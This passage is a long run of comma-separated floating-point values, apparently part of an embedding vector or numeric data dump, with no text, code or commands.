0988883,0.03593592,0.0019501531,-0.015793106,0.017716952,-0.0007911158,-0.0047387667,-0.02033269,0.023762168,-0.0026685612,-0.00850501,0.0055493126,-0.0043592583,0.0000066735925,0.021271713,0.0030007735,0.0012802896,0.0039329575,0.00783106,-0.0038218827,0.026595643,0.023851799,-0.013986503,-0.0040425444,0.0044320556,-0.001939317,0.0050394055,0.0118177,0.031260926,-0.013631778,-0.0031608366,0.00848628,-0.0013884568,-0.0086811865,-0.020768948,-0.003767381,-0.011259368,0.018377313,0.015378601,0.01156697,0.026698036,0.0073652575,0.01299255,-0.015219279,-0.003439156,0.0010871607,0.014858075,-0.002382129,-0.0055297404,-0.01543805,-0.009435,0.017826611,-0.026546303,0.009992848,-0.003645432,-0.007094481,0.046510592,-0.004063611,0.0014518818,0.0011980616,0.0010948796,0.00079389353,0.0055229873,0.0035641242,0.0010634455,0.023287205,0.021011276,0.004318882,-0.007690086,0.0029320458,0.01579076,-0.002808092,0.004028899,-0.012381915,0.01664515,0.0031766484,-0.020239638,-0.00047706382,-0.005262803,0.0030392986,-0.0061903987,0.010922667,0.014485511,0.011230387,-0.032139633,-0.0026662415,-0.01926816,0.01539614,0.030373488,0.0091146,0.004017956,-0.0014804789,0.006690501,0.0008933451,-0.01425502,0.02133798,0.010048903,-0.09648085,0.020159382,0.011229604,-0.0099947415,0.007130395,0.00076657365,0.0031245502,-0.002740772,0.04030567,-0.015951702,0.007033837,-0.0018108652,0.0060559716,-0.009365033,0.012203694,-0.024026074,-0.026948184,0.035722826,0.0023721019,0.0012411987,0.012427183,-0.0027311798,0.0071576787,0.009783023,0.023889508,-0.007011181,-0.0003089686,-0.013776801,-0.003703327,-0.00374163,0.020288728,-0.007282869,-0.0021445975,-0.0012039687,-0.020227619,-0.023552736,0.014287294,0.025244154,-0.016744714,-0.0013104422,-0.030323157,0.0061176876,-0.013616002,0.019003596,-0.009599195,-0.01416477,-0.013418503,-0.022638068,-0.019970985,-0.03693743,0.0003950942,-0.024458237,-0.014246742,0.025544548,0.013719551,0.022844845,-0.016887939,-0.0037715212,-0.016670208,0.0010732295,0.020478886,-0.014725663,0.0049231765,0.009966565,-0.02856416,-0.011367835,-0.004098531,-0.00048200242,-0.0020188394,-0.00308109,-0.0113454955,-0.0006506465,0.007469759,0.003960603,-0.017157689,0.025057357,0.00015771891,0.0008166886,-0.0029595355,0.0039880215,-0.019560648,0.011145906,-0.00236421,0.017581021,-0.029482383,0.014229954,-0.017184434,0.020414598,0.012426173,-0.021213325,0.022511076,-0.0013871873,0.017129127,-0.0015951934,-0.011736548,0.010973042,0.018134182,0.008204512,-0.013632717,-0.009124383,0.012260874,0.007254908,-0.011416141,0.04013991,-0.0010965003,0.0008661589,-0.000746997,-0.026974019,-0.0026660478,0.01709145,-0.01959117,-0.0014303797,0.007328655,0.0035657566,0.012940132,0.0045518703,-0.012772673,0.016117912,0.029657884,0.01817715,0.0069105765,-0.02722055,0.007731018,0.009221349,-0.0022698613,-0.005119516,0.0047578323,0.0064508887,-0.02674483,0.006197528,-0.009013526,0.0028400815,-0.022395067,-0.014835802,0.018186988,-0.008079038,-0.012672458,-0.010154206,-0.011935678,-0.0028248124,-0.01999955,0.006290788,-0.020038063,0.012649164,0.0003811745,-0.007957879,-0.001325073,0.0196942,0.006231182,0.029868552,0.019918308,-0.0015518229,0.007034726,-0.0024919794,-0.018632421,0.018489476,-0.005546812,-0.019255413,0.013095921,-0.005013339,-0.028442707,-0.018010026,0.001342087,-0.0011763494,-0.009491272,-0.023991121,-0.014448407,0.01574332,-0.0074701253,0.0014431761,-0.0008351392,0.010148017,0.00048554665,0.0155106895,0.019167785,0.01398329,0.028207539,0.008059343,-0.0098476885,0.005655302,-0.0023622408,0.0253849,0.04029062,0.019283807,0.018603457,-0.028907811,-0.006745569,0.01489432,-0.027545748,-0.038829595,-0.0025830965,0.007738386,0.00426754,-0.0037350927,-0.017902024,0.012831304,-0.020101111,-0.0027223642,-0.0127708735,-0.009475802,-0.008869161,0.0049547222,-0.013781044,-0.0073820627,-0.0052804053,0.013997633,0.030870527,-0.031742923,0.013421374,0.0018260232,-0.017593864,-0.0054214546,-0.022372385,0.0004279518,-0.014658762,-0.01153506,-0.018988285,-0.014677406,0.022782905,-0.046278436,0.010900828,0.017832043,-0.015412988,0.003659754,0.007407671,-0.00009890182,0.006423568,-0.006721497,-0.008067086,-0.00013414441,0.019218087,-0.01227352,0.044795826,-0.0145215215,-0.0058901673,-0.00086289184,0.0017408576,-0.01805716,-0.0060297647,-0.022419062,0.0017496685,-0.0016088911,-0.0028793337,0.0094376495,-0.010880191,0.021357391,0.016886352,-0.009191563,0.019856729,0.0153874755,-0.031927295,-0.016110506,0.009435447,0.006464818,-0.03524641,-0.001390364,-0.013720782,-0.018963015,0.002964414,-0.015001133,-0.010890187,-0.004563377,0.006130646,-0.0012196533,0.018223075,0.010919955,0.012866995,0.018888418,0.012934417,0.002654341,-0.031638928,-0.0001279938,0.010391495,-0.010322659,-0.0068362076,-0.0061182235,0.010200588,-0.017437851,-0.0057845614,0.003969643,0.009493735,0.003766817,0.031193985,-0.021035114,0.02844397,0.009966771,-0.0016166782,-0.011906262,0.027710259,0.005815313,-0.008706034,-0.0006865939,0.0067327586,0.022109082,0.015189805,-0.0014570727,-0.0043001557,-0.010381385,0.026661955,-0.018092494,0.098893255,-0.029513491,-0.015764914,-0.002860848,0.0052864156,-0.005174325,0.020569675,0.02233761,0.016257936,-0.016220914,-0.025754252,-0.010996329,-0.002098121,-0.025917385,0.026037302,0.00024022459,0.0041748947,-0.0035576862,-0.012512389,0.005928476,0.027946535,0.016508928,-0.013013306,0.0051568896,0.0006268898,-0.0069228606,0.0130149,0.0029924398,0.011196534,0.0010113487,0.0052907458,-0.019480897,-0.0072555295,0.01074534,-0.0021105441,0.004665258,0.03368524,0.0006905068,-0.034533482,0.014397333,0.0046114824,-0.008803402,0.06154241,0.00043668674,0.00072871434,-0.008211053,-0.013454346,0.0067268005,0.020486541,-0.016512683,0.016842509,-0.0094326595,0.001911781,0.01635782,0.0062440815,0.025953082,0.00038152296,0.019105073,0.023438815,0.017273141,0.010739789,0.01201822,-0.015280662,0.0014919022,-0.016225653,-0.00097424677,0.00080830796,0.0026675179,-0.0045788763,-0.010992412,-0.016173815,-0.009313525,-0.0021487225,0.003880955,0.0072718235,0.023337042,0.03521195,-0.009454689,0.008400445,-0.015949013,-0.0070196516,-0.0071034855,0.023046518,-0.008436463,-0.001975221,0.002181774,0.027962811,0.0026908887,0.059846587,0.036489893,0.02422594,-0.004610649,0.012855151,0.031813998,-0.0016312803,0.02180678,-0.009091778,-0.0028250897,0.0014494351,0.016158117,-0.011389001,-0.012620377,0.012858816,-0.0073225223,0.010923683,-0.0013552619,0.019807108,-0.0044542225,0.008441657,0.021751642,0.0044146585,-0.008817154,-0.008251535,-0.00069420494,0.010083498,0.007770624,0.018783458,-0.01218814,-0.013631368,-0.0021946642,-0.0072043003,0.017206559,-0.002129216,-0.06926175,0.0020453623,0.15078612,-0.006391625,-0.005972387,0.001369615,-0.00436914,-0.0022580698,-0.10613006,-0.01849461,0.0015743298,0.020119186,-0.009316792,-0.016406896,-0.003733133,0.0047075367,0.014249199,0.016174274,0.016287597,-0.032049086,0.018519511,-0.013925777,-0.01301203,0.017148394,0.015737409,-0.0141965,-0.010943721,-0.010641239,0.009459564,-0.004352575,-0.025268199,-0.0019039516,0.010174704,-0.008800297,0.0014664981,0.0091055045,-0.022443572,-0.0019326061,0.022279294,0.033696186,-0.010147872,-0.0081414925,0.0075359107,-0.0019422371,-0.029863352,-0.03967119,-0.16099049,0.0016817825,0.006976829,-0.03055363,0.022219507,-0.014324881,0.00062323926,0.0033993898,0.0064315125,-0.038262744,0.020044368,-0.00070649537,0.018333996,0.02520065,-0.0039863163,-0.016523885,-0.014105242,0.007861655,0.0077556507,0.012566838,0.01889741,0.014967289,-0.00094652956,-0.008260712,0.0014726537,-0.008475424,0.001926358,0.007555019,-0.012916554,0.013772125,-0.006120001,0.005292912,-0.013467716,-0.0013404785,-0.024804574,-0.012641704,-0.008140711,0.0038355396,-0.0022188977,-0.003656477,-0.010876885,-0.005313853,-0.0022534295,-0.017035395,-0.009247067,0.0026958985,-0.0011173823,-0.0035064907,0.007433346,0.007030004,0.0076453323,-0.0047499435,-0.023570504,0.005796747,-0.007297426,-0.0042160084,-0.019358031,-0.008562391,-0.020533258,-0.00097623386,-0.017487718,-0.0033866882,-0.008734625,-0.012150773,0.027061094,-0.0054823672,0.0031012492,-0.027915176,0.0020896494,0.0067502,-0.010058819,0.0011436573,0.006485416,-0.01004385,0.019052194,0.013062158,-0.015033894,0.022635754,-0.0098651815,-0.015440778,0.0066126892,-0.003750332,-0.0015171674,-0.02500936,-0.000044358247,0.0060261753,-0.00707803,-0.01690558,-0.0041038785,0.00070802355,0.015678864,0.0066913604,0.02296352,0.010973171,0.0026587795,0.010201398,0.026005682,0.01446226,-0.033247437,0.014545769,0.0021234404,0.00041434707,-0.01861805,0.004821059,-0.021623166,-0.012010412,-0.010457563,-0.01484849,-0.026529523,0.016313553,-0.018044917,0.00860008,0.00422179,-0.009887843,-0.028299697,-0.036652125,0.00688497,-0.0020194638,0.007825749,0.005380997,-0.028895715,-0.014048355,-0.012026932,0.0013795709,0.030007474,0.0045048925,-0.021528615,0.008533067,0.0115229795,-0.035856616,-0.019228952,0.0027797823,-0.000686344,0.021206575,0.00053068675,0.0066849645,-0.0048806146,-0.012568241,-0.02872495,-0.009191581,-0.005189726,0.004430473,-0.0179427,-0.0011882049,0.026950223,-0.009040821,0.037644032,-0.0136994235,0.041327156,-0.017685363,0.000026382151,0.036037467,-0.0077299927,-0.007411885,-0.011697055,0.08398659,-0.012157438,-0.02255586,-0.00083362457,0.003068223,0.0054502003,0.011082594,-0.0072944677,0.0064098053,-0.0236248,-0.021037124,-0.007057868,-0.0075742626,0.0136548765,-0.009078597,0.029700361,0.009441443,0.011361502,-0.00781686,-0.015827589,0.013785959,-0.0106097115,0.0012815188,0.04502564,0.023483358,-0.0015987541,-0.009113465,-0.002893692,-0.013930816,-0.011800252,-0.01573439,-0.012338087,-0.017730588,-0.010444364,0.01851628,-0.060012974,-0.020734612,-0.0009273514,0.005330524,-0.008272253,0.006704252,0.012468826,0.008272799,-0.022190925,0.017637499,0.0052942336,-0.0015398106,0.016176403,-0.010924807,0.0036207377,-0.0060116732,0.012077978,-0.0010728094,-0.030080179,0.015787585,-0.027275298,0.007170545,-0.007637346,0.0011731024,0.0042641307,-0.0017203179,-0.011813619,-0.016686121,-0.009705696,-0.009419682,-0.00634112,0.000055807148,0.004346196,0.0125924265,0.01883245,-0.007128035,0.028078534,-0.00034199926,0.020586891,-0.01262759,-0.006566177,-0.0067268107,0.020104755,-0.019694146,-0.004346602,-0.000405514,0.013820741,-0.004547238,0.012629878,-0.027421908,-0.039814454,-0.0043287915,0.013412915,-0.01568929,0.010767154,0.019505937,0.019641902,0.02720714,0.00079237716,0.011591897,-0.0021852828,0.004549157,0.009916627,-0.00928176,0.0108948,0.03113919,0.018773295,-0.008472365,-0.01883584,0.009844367,-0.024751242,-0.011274842,-0.00816635,0.0046964977,-0.011895529,-0.01340009,-0.013264189,0.0061164396,-0.011924499,-0.0005111967,0.020908628,-0.030917685,0.004311273,-0.0010513709,-0.012875398,-0.01839748,-0.013438892,-0.012239376,0.0010682809,0.06374723,0.014864268,-0.010148319,0.018203467,-0.026284365,0.018083,-0.005451437,0.016961548,0.015446036,-0.005196275,-0.0017102839,-0.0028919184,0.0099537335,0.018915126,-0.00815076,0.0073853037,-0.008006292,0.00903156,0.0054110643,-0.033944797,-0.010436918,0.006050743,0.013616888,0.014347107,-0.014886359,0.006323128,-0.021129679,-0.025519233,-0.010888705,0.011508868,0.011385831,0.03161088,-0.04305514,-0.007013357,-0.008834774,-0.010146193,-0.020615315,0.014351229,0.017854467,-0.01812473,-0.0064860876,0.021508344,0.03795414,-0.012984306,0.024581326,0.004233372,0.007950765,-0.008204302,0.019548118,0.014117244,0.0014584495,0.024844427,0.023101477,-0.01373069,-0.009893635,0.017488439,0.01610949,-0.0053413645,-0.0016933142,0.0006670548,0.028089846,-0.024669133,-0.0026646443,0.027612548,-0.002870064,-0.012809936,-0.021104623,0.0020787015,0.024633424,-0.026513932,-0.01704926,-0.020269807,0.011160035,-0.035990823,0.022676982,0.012882646,0.00044713545,0.029519627,-0.0058134506,-0.023950255,0.0102480445,0.005052825,-0.005087273,-0.012543309,-0.018163726,0.0068429545,-0.0058144256,0.000310015,-0.0024093734,0.00094636396,0.018977087,-0.006853728,0.00052947324,0.018283743,-0.008580188,-0.040411204,-0.003548254,0.010908256,-0.020613829,-0.003925757,-0.025188055,-0.0078581255,0.0024714484,0.03686775,-0.0044101626,-0.0016866297,0.020686124,0.031576823,0.030382274,-0.004810535,0.0049383477,-0.014690548,-0.00085770147,-0.014907175,-0.015118234,0.002530921,0.010761837,-0.007410428,-0.011409966,0.011414983,0.015397686,-0.01825179,0.004907066,-0.008562846,-0.0036673713,0.007729092,0.022221917,-0.023139752,-0.018407796,0.021377372,0.0036409884,-0.025918534,0.0071636047,-0.02400752,-0.0077552926,-0.022075327,-0.013480171,-0.0061646206,-0.005118129,0.004002204,0.0041147894,0.011301992,0.010768706,0.016648771,-0.0029139898,0.013625119,-0.015189013,-0.006345484,0.0074511203,0.016552212,0.0059188507,-0.024627304,-0.000857507,0.01274813,-0.009844523,-0.0020410079,0.024623638,0.023231085,0.0086020045,0.0048662974,-0.0033944729,0.00956336,0.02044644,-0.009850924,-0.006287624,-0.008104322,-0.013315349,0.024275351,0.0035468133,-0.02287712,-0.019762767,0.0041346336,0.015822232,-0.022483231,0.015924351,0.0077575035,-0.014382875,-0.0021997208,0.0030700045,0.008585174,-0.00050926034,-0.005912268,0.0053973156,-0.019371063,0.024050405,-0.022731982,0.0066828136,-0.016119206,0.023545744,-0.007979658,-0.011718599,0.007606853,0.0027756637,-0.000047473888,-0.010015661,-0.0133352475,-0.017032154,-0.028345203,-0.004877272,-0.0028040754,-0.008782962,0.015408569,-0.024796385,-0.013025731,-0.010404209,-0.00009822341,-0.0029235356,-0.011816332,-0.002162976,-0.25583455,0.0067357398,-0.022863688,-0.02815161,-0.0069712275,0.002025495,0.0060969745,0.038938418,0.0054306644,0.015971137,-0.006818146,0.026965624,0.008540124,0.02052808,0.011774329,0.0020086188,0.005043602,-0.017022604,0.008364291,0.005802523,0.0048162644,0.018585423,-0.0015341714,-0.006502772,0.018313482,0.02827507,-0.0024976758,0.0022479852,0.016710972,0.02455582,0.011026694,0.013242878,0.006916472,-0.012752764,-0.0109050535,0.00763721,-0.0006060322,0.020874836,0.012563155,-0.0047890535,-0.0060326955,-0.026015306,-0.010702165,0.022127723,0.017171595,-0.005157963,0.024729047,0.024200404,0.005237419,-0.016943173,-0.017794814,-0.017607203,0.018160427,0.004811516,-0.010645563,-0.0034767922,-0.019610647,0.007995455,0.014771226,-0.018356761,0.01171676,0.042945895,-0.0038737364,-0.014531645,0.0009518573,0.006880065,0.009197864,-0.0056287376,-0.020612806,-0.0020234676,-0.014272306,0.0109799085,-0.0070608524,-0.0023183266,-0.01082238,-0.0034115461,0.011154959,0.008097515,0.006349126,0.023140091,-0.0102457795,0.013230758,-0.0012519421,0.017347675,0.02262399,0.012813139,0.011324932,0.017301515,-0.0022670254,-0.008487598,-0.00392414,0.006633032,-0.01671015,-0.015626656,-0.009270441,0.013326123,0.0022158513,0.037374817,0.022008711,-0.005244579,-0.0030290987,0.022690257,-0.018947884,-0.011087106,-0.12020074,-0.003173424,0.009025819,-0.0009315493,-0.011340549,-0.0065797046,-0.0016846248,-0.005883695,0.020521581,-0.0005605152,-0.0052768094,0.0016266842,0.017766861,0.010750555,-0.015286274,-0.0016547148,-0.03288694,0.006572371,0.0026205205,-0.010400116,-0.00052633276,-0.019345663,-0.01899992,0.0130951535,0.010094885,0.0029367816,-0.0068420665,0.044921346,0.010336698,-0.0165851,-0.0018520994,-0.00022974084,0.004522209,0.0054866644,-0.059025872,-0.03231347,0.013926534,0.006608068,0.009659302,0.004102105,0.006210846,-0.008141957,0.0009937099,0.01298742,-0.0061754086,-0.0021117271,0.012695708,-0.012859853,0.026709845,0.0014840099,-0.014121782,0.0018078492,0.01102786,0.012266713,-0.002741909,-0.005448883,-0.0034320927,-0.014971211,-0.021877212,0.0065955287,-0.013925802,0.01908722,-0.014183799,0.0050153662,0.023905035,0.014762891,0.008455886,-0.010768844,-0.0123395575,-0.00076715584,-0.017108457,0.017406566,0.040380772,0.0043686465,0.021050597,0.009766507,0.0073112664,0.034266938,0.01766186,-0.0073547107,-0.014459979,-0.012869414,0.0014967492,0.018816816,-0.02031716,0.0042249644,-0.01848507,0.027426615,-0.013271997,0.0056586135,0.012345134,0.005572088,-0.037727244,0.013279554,0.018046996,-0.003104391,0.008312483,-0.013723275,-0.0007502694,-0.0139103625,-0.045603976,-0.0014380313,0.007345822,-0.011105948,-0.014244078,0.024269389,0.006604377,-0.01854814,-0.023971116,0.0075110956,0.023275904,0.02527073,-0.02228508,0.00075913704,0.006454126,-0.0015999177,0.0060939933,-0.01776491,-0.008087378,0.011821487,0.021707283,0.011586702,-0.006963695,-0.019681113,-0.02353737,0.008611345,0.008958083,0.0113466,0.032979533,-0.012814457,0.012619219,-0.0110700205,0.0057015736,-0.038176432,0.0040551913,0.00066789583,0.02022291,0.0052022757,-0.0010935012,-0.01223271,-0.010037724,0.0027868736,0.0043059303,-0.0072712116,0.004535372,-0.011288636,-0.0010628775,0.01807933,-0.010509176,0.008870099,-0.0086554745,-0.005295491,0.011446871,-0.0020433948,-0.0060814824,0.012274288,-0.022219246,-0.0039235908,0.00937536,-0.0046093445,0.009475801,0.015409851,0.013709486,-0.008231441,0.0032522336,0.02581622,-0.008785954,-0.019980848,-0.0049428456,-0.007961508,-0.0009675151,0.0015481935,0.0061962428,-0.0014977078,0.01353079,0.026952406,0.01394461,0.032125343,0.005417503,0.0010331387,0.009916469,-0.006517706,-0.04242386,-0.005378522,0.017979624,0.0019168339,0.0022441165,0.009492315,0.0052784663,0.029380117,0.02586437,0.0063468697,-0.017777354,0.01648286,0.012179069,-0.00813744,-0.00043333662,-0.011885937,0.021384066,0.003985743,-0.0065365504,0.009956156,0.0128778545,-0.015575965,-0.015828148,-0.00952292,0.0049807895,0.017175363,0.0039980914,-0.0030715193,-0.017376948,-0.00947959,0.0027825648,0.00985286,0.009054034,0.016059343,0.002208384,-0.016423568,0.011696362,0.026801063,-0.007708252,-0.011633479,0.014695706,0.007881345,0.0100815445,0.033294294,0.0071689095,0.002052897,-0.016900633,-0.020115811,0.020462098,0.018825158,-0.009453073,-0.002847792,-0.002468508,0.0017716896,0.010935432,0.023026817,-0.020783948,0.0090089645,0.0061295796,0.024080388,0.011973688,0.013866048,0.0037073526,0.0005315454,0.017563483,0.0048460877,-0.0113836005,0.015013157,0.0036224145,-0.009076943,-0.0013511302,0.015386275,-0.02267915,0.0013491579,0.023485899,0.005602171,0.0014274132,-0.007882769,-0.0011815823,-0.028257066,-0.028031247,0.008046251,-0.008475637,-0.011088909,0.01959921,-0.0022154558,-0.002378627,0.021268297,-0.019267682,0.0010098215,0.004075058,0.01826737,-0.0065656547,-0.0026101365,-0.008037592,0.010519719,-0.0038064374,0.006871283,-0.016763696,-0.004544693,0.005884885,0.005998826,0.017794512,-0.009707246,-0.018726824,0.0042153704,-0.011153382,-0.008833707,0.016267778,-0.0021396189,0.014767298,-0.02220361,-0.013365172,0.02404913,0.013745613,-0.0065921005,-0.0059507787,0.0017723484,0.0054361117,0.01573591,0.005828499,0.0095492285,-0.0013442272,-0.0027660672,0.0011410986,0.00002819437,-0.014048965,0.012006778,0.0051086857,0.009043452,-0.027193144,0.019954108,0.008331489,0.004648238,-0.021667935,-0.0021276916,-0.011883747,-0.0016016188,-0.007843787,-0.010658264,0.037243597,-0.0016404331,-0.0010344952,-0.0074546305,0.002579535,0.017098302,-0.0042023663,0.0021482406,0.011009978,-0.020349534,-0.0021701232,-0.005428908,0.00986492,-0.01703015,0.00382639,0.013483587,0.0044606477,0.0042164153,0.0038141578,0.008584759,0.007026451,-0.019465338,-0.016370218,0.0011253256,0.005746146,-0.0058724587,0.020572152,-0.0025152063,-0.008003083,0.00075878476,0.015290365,0.015666792,-0.021226045,0.01914294,-0.021147985,0.0071412683,0.0034132372,-0.0017581168,-0.0328425,0.025209786,0.00014194514,-0.006499024,-0.012189281,-0.014715764,-0.013816583,0.013279983,-0.0103502935,-0.000060176404,0.008945158,0.0038088134,-0.0264748,-0.0076933014,-0.022532724,-0.09285994,0.012909104,-0.0032227454,-0.00087342307,-0.000120637415,-0.0027691338,-0.011640784,0.0011084002,-0.008823828,0.009556278,-0.011762626,-0.0051003504,0.0067206714,0.009751324,0.019872222,-0.018314553,0.011306936,-0.0022719894,0.008304371,-0.015235428,-0.002409538,0.021174785,0.0073621175,-0.0046802466,0.016763978,-0.009419954,-0.015638404,-0.014840251,-0.003495988,0.02468709,0.029730268,-0.0013137218,0.00012871272,-0.008221288,0.0043251077,0.0013816783,-0.0023379545,0.021586938,0.0077967583,-0.008274531,-0.033323664,0.0049317554,0.021597607,-0.0053246077,0.0040938463,0.007942378,-0.027358724,-0.012022702,-0.032565683,0.021695448,0.0058801025,0.0142102195,-0.011729149,0.011678001,0.004250569,0.015296024,-0.0026401205,0.0042947773,0.035934225,0.004002508,-0.020491986,-0.00077232224,0.018451864,0.012668325,-0.007043271,0.01498012,0.0015677463,0.02148783,-0.013768475,-0.00051402947,0.0053115455,-0.018889405,-0.020124374,-0.018916164,-0.010689109,0.021453151,-0.02474975,-0.023132056,-0.012243847,-0.0118400045,0.010654956,-0.013711714,0.010912519,0.009390524,-0.009883381,-0.0076805013,-0.005575557,0.017355705,0.027108198,0.015391802,0.0023697386,0.011988643,0.010232624,0.012216178,-0.0112010585,0.034602918,-0.0074304366,-0.010365119,0.021642206,0.021484794,-0.026232183,0.0039064023,0.012780166,-0.02469953,0.00036808787,-0.019408708,-0.009576653,-0.0205106,0.0006736762,-0.0050584604,-0.012026391,0.013014636,0.0221178,0.027132643,0.022456136,0.013411206,-0.016702175,0.005549602,-0.016635956,0.0042294245,-0.0016204157,-0.015736882,-0.011368003,0.0038960702,0.0009347117,-0.0018984815,0.0026765151,-0.01777786,-0.029375883,-0.0023008173,-0.01101545,0.012506721,0.018084837,0.03877784,0.012856947,-0.005625436,-0.0018127024,-0.011944278,-0.008756602,0.017724596,-0.013462916,-0.027558932,-0.014534689,-0.008649551,0.0057285847,0.051247194,0.0046227444,-0.014463958,-0.007369404,-0.012284189,0.0035535388,-0.0011354239,-0.0037833839,0.011289441,0.0062460145,-0.014737074,0.022045096,-0.0034924052,-0.0146230785,-0.007961386,0.0026972871,0.018766215,0.0040939995,0.012092884,-0.006793761,0.0033157647,0.0090803625,0.0034057694,-0.0026574116,-0.022233658,-0.0126348715,-0.0020605256,0.009676882,-0.0056723524,-0.030982723,0.009870504,0.01216369,0.0022275536,0.01448173,-0.0031046553,-0.01107062,0.00003339064,0.010328888,0.02004615,-0.005786462,-0.0062334877,-0.004220426,-0.01634617,0.008428158,-0.035041556,-0.022515014,-0.012240892,-0.0026434148,0.02542426,-0.013803982,-0.008624653,0.0017800237,0.0018382561,-0.00096281193,0.02835803,-0.019889066,0.0010627392,0.0032853282,0.01818154,0.02091557,0.01851924,-0.0017901359,-0.0057455855,0.0006203565,-0.0029151142,-0.007393458,0.020158295,0.013792224,0.09069046,0.010316082,-0.008358262,0.009040679,0.0052711633,0.014163611,0.02438649,0.006721072,0.009199121,0.020988327,0.0035242187,-0.002983711,-0.0027970884,-0.0063214637,0.0015392319,0.028708763,0.026779307,0.0033939271,0.0120650055,-0.027372181,0.017647937,-0.016277676,0.009235532,-0.0009735609,0.012730976,-0.04034747,0.017802453,0.029924203,-0.0094178235,0.016489606,0.01662472,0.018569242,0.023438348,-0.006899937,-0.019814137,-0.021231834,0.02828489,0.009231021,-0.0042771245,-0.0105137825,0.0069182212,0.0046460866,-0.0060272804,-0.036898643,-0.019360011,0.000922172,0.005171044,0.0037527217,0.011322895,-0.020178732,0.008147576,0.021737581,0.0049477434,0.0014745415,0.001820417,0.0055360654,0.010685244,-0.0033676142,0.008001352,-0.0017891466,0.030674865,-0.01342648,0.0014154298,0.016998198,0.0107342815,0.011747905,-0.0073251287,0.0004996881,-0.050748788,-0.017911432,0.03393105,-0.014614056,0.011251248,0.023594787,-0.012746154,0.0072084526,-0.0031759096,-0.022567417,-0.023010163,-0.012494932,0.0074169533,-0.0028501954,-0.009103096,-0.01346365,0.008960944,0.013426514,-0.00617518,0.018032549,-0.008810154,-0.015703306,-0.0013390288,0.008727523,0.012095877,0.016596872,0.0016370862,0.012325218,0.0073245396,-0.012874891,-0.01065443,-0.010167149,0.00011999884,-0.010276955,0.011147553,0.0015625652,-0.016098944,-0.022977406,-0.000119838885,0.02088418,-0.014861337,-0.018809097,0.010452512,0.019650383,-0.01131517,0.010416986,-0.019640157,-0.0016290533,0.00018954623,-0.009634198,0.01892351,-0.019662652,0.008642741,0.025513178,0.0166912,0.0326806,0.011169864,0.0015837633,-0.013133749,0.023814695,0.029696234,-0.010844287,-0.00027612192,-0.038532414,-0.01348607,0.02038294,0.004692458,-0.018456593,0.038696885,0.0074309492,0.018389288,0.025808025,-0.0005714786,-0.000004763507,-0.010609907,-0.0071959947,-0.012202468,-0.010110941,0.015886378,-0.007908312,0.0021025331,0.014508512,-0.007128441,-0.00076106814,0.016241848,-0.0052548186,-0.0150845405,-0.018850267,0.010337873,-0.009757912,-0.036444265,-0.006812595,0.029490806,0.0062903333,0.010108409,-0.022125991,0.025532905,0.007291801,0.015578478,0.00077506766,0.009894927,-0.00933389,-0.010910399,0.0061284923,0.017642327,0.007167438,0.007751252,-0.00052872935,0.01607401,0.017887501,-0.020517852,-0.002814552,0.0064068525,0.009531103,-0.025288833,0.019437889,0.020137055,0.0033659989,-0.03166865,0.0072352174,-0.016850753,0.0403245,-0.016309807,0.014470545,0.005958911,-0.0005625092,0.020785155,-0.0017770973,-0.02173536,0.02941094,-0.025440812,-0.041135512,-0.007897198,-0.0034429112,-0.004251034,0.011497241,0.001050739,-0.022894049,0.006297132,-0.009515055,-0.009349703,-0.0036114112,0.011393458,0.01084434,0.002346073,-0.022585802,-0.008938088,0.009095636,-0.0151040405,-0.014279466,-0.017558139,-0.009747779,-0.00027503798,-0.021154817,-0.020567717,0.0034832512,0.009493829,0.004910964,0.005919398,-0.016751932,0.016397532,-0.016716838,-0.004791863,-0.0030134376,-0.02824891,-0.002198235,0.026028235,-0.010094171,0.02786992,0.023264918,0.0027544652,0.010289788,-0.0010453624,-0.016521772,0.004458585,-0.026784465,-0.019123953,-0.016377753,0.002068186,-0.00608426,-0.00022183584,-0.029609328,-0.007942719,0.003148656,-0.01900557,-0.0143707525,-0.015834969,-0.0102961715,-0.0067746383,0.02433871,-0.0048044594,0.00065598777,0.007012935,-0.0065238588,0.008546941,0.021003498,-0.005357175,-0.00022439424,0.009543882,-0.007201271,-0.014440314,-0.010830541,-0.014258412,0.01635003,-0.026237175,-0.010605115,-0.022374634,0.0035569754,-0.014303087,-0.0039242906,-0.007870754,0.0068361247,0.007349633,-0.01607802,0.010188914,-0.022325266,0.016922979,-0.020331461,0.011107297,0.014745414,0.017822303,-0.036020495,-0.008677121,0.05031519,-0.014701077,-0.02637376,0.0125714075,-0.0099838665,-0.07032962,-0.033577487,0.026369046,-0.013645374,-0.00050988304,-0.03650282,-0.004789378,0.004533842,-0.016740989,-0.0058245636,0.005264367,0.0060035205,-0.0024050293,0.016476136,0.0020782999,-0.0012992106,-0.0028435516,0.0058065425,-0.011209444,-0.017438933,0.007317839,0.0067116823,-0.002158997,-0.008412482,0.014387433,-0.0203044,-0.008782867,0.0006403462,0.019306738,-0.00685401,0.015062809,-0.007961961,-0.015675336,-0.025342168,0.0016373814,-0.0048990734,-0.015008961,-0.004267584,0.0010882993,0.016290817,-0.017069422,0.12310541,-0.0006417926,-0.022879835,-0.0065383515,-0.0024985431,-0.011480487,-0.008614186,0.02062865,-0.006380243,0.020189406,-0.014478739,0.0061469446,0.0073530665,0.016040571,0.014850773,-0.03225366,0.0043869135,0.09904564,0.006430707,0.036418416,0.019789353,0.0067474097,0.029413648,0.016433032,0.020998875,-0.08737399,-0.0069903717,-0.025049962,0.016354427,-0.0047633587,-0.031057356,-0.007978001,-0.0018682099,-0.016662704,-0.0010176323,0.024728922,-0.005656263,-0.025441537,-0.034267157,-0.013958678,-0.004065586,-0.01411563,-0.0012173061,0.012109698,0.01363156,0.012213694,0.0051329783,-0.009831176,0.021449126,0.044475593,0.033359684,0.009572911,0.002108875,0.008715689,0.013512417,0.011616875,0.0061790505,0.021454925,-0.05726583,0.017818108,0.0033810954,0.018386932,-0.013892382,0.026411464,-0.0015928003,-0.008628126,-0.0013752872,-0.0027088863,-0.0016990105,0.019531736,0.01710706,0.009394584,-0.03108176,0.0065286723,0.0072290185,-0.015983582,-0.0086725885,-0.00944023,0.00054922514,0.0013507726,-0.012168625,0.030206945,-0.023347346,0.0008974385,0.018044164,0.022154951,0.0175313,-0.0027120516,0.0038244864,0.0032663825,-0.0242225,0.0015387308,-0.006054417,-0.0022041015,-0.010016631,0.02176189,-0.0034213013,0.012711302,-0.0006722586,-0.00258457,-0.001957991,0.009791898,0.018387794,0.004660693,0.010164012,-0.0032390573,-0.015566315,-0.008120891,0.007159149,-0.011731257,0.01878832,0.023025606,-0.015904056,-0.0029696939,-0.03131457,-0.019429475,0.018549195,0.019625353,-0.023063604,-0.004671322,0.0015845014,-0.017159363,0.020256838,0.0037448513,-0.02944